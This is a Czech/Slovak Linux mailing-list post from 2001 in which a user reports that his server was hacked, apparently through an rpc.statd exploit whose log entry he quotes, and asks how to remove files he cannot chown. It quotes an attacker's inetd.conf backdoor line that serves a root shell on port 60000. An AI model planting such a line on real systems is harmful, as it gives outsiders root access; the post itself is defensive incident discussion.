Problem s top

Peter Hanusiak hanusiak na sozo.fns.uniba.sk
Úterý Září 4 11:14:41 CEST 2001


On Tue, Sep 04, 2001 at 09:36:42AM +0200, Dan Ohnesorg wrote:
> 
> Jsou jen dve moznosti, mate v cudu disk (mene pravdepodobne) a nebo mate v
> systemu hackera, ktery modifikoval i chown a souvisejici utility (vice
> pravdepodobne).
> 
> Je to zrale na cistou instalaci, ale cvicne jeste muzete skusit
> namountovat disk v jinem stroji a pak provest chown. Tedy aby to nebylo
> blbe pochopeno, ten disk tam namountujete treba jako /test, nic z nej
> spoustet nebudete, binarky musite pouzit z te druhe instalace.
> 
> Pred instalaci jeste skuste badblocks na overeni povrchu disku (instalator
> to nabizi pod volbou proverit disk nebo tak podobne).
> 
> zdravim
No to co som si myslel, ze sa mi nemoze stat sa stalo. Naozaj mi ten
server niekto hackol. Ale mal smolu, ze som cez dialup takze asi v
najlepsom sme ho vypli. Celkom pekne sa tu zabyval dotycny. Mal tu
dokonca aj sluzbu /etc/inetd.conf
60000 stream tcp nowait root /bin/sh sh -i
Hazlik jeden. Uz som kopec veci odstranil ale stale neviem niektore
subory dat prec, je to nejak zablokovane. Dokonca som bootol
init=/bin/bash a tiez to neslo. Nemam teraz iny linux takze nemozem
presuvat disk inde a menit to. Ked som pozeral cez strace ze kde to
prestane fungovat tak to skonci napr. ked dam chown na dotycny subor tak
pise
chown("/usr/bin/top", 0, 0)             = -1 EPERM (Operation not permitted)

Nevie niekto poradit ako to by to slo nejak oklamat aby to islo
odstranit?

Dalsia vec, pozeral som sa do logov a system mi nabural asi cez tuto
sluzbu:
Aug 30 15:57:44 locus rpc.statd[402]: gethostbyname error for ^X÷y?^X÷y?^Y÷y?^Y÷
y?^Z÷y?^Z÷y?^[÷y?^[÷y?bffff750 8049710 8052db0687465676274736f6d616e797265206520
726f7220726f66 
bffff718
                                                             bffff719 bffff71a

							                          bffff71b 

A dalej uz samozrejme nic nemam v logoch, vsetko vypol.
Pikoska je je si z mojho systemu chcel chlapik poslat mail s nejakym
vypisom o mojom kompe a preklepol sa v adrese takze mi to prislo spat.
No a jeho adresa je, keby to niekoho zaujimalo, pravdepodobne
iuli_root na yahoo.com


	Hanus



-- 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+------------------------+--------------------------------------+
+ Peter "Hanus" Hanusiak | E-mail  : hanusiak na sozo.fns.uniba.sk +
+------------------------+ HomePage: http://www.hanusiak.sk     +
+    FMPI UK Slovakia      Tel.    : +421905504772              +
+----> Look at my DB : http://algebradb.sourceforge.net/ <------+
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Další informace o konferenci Linux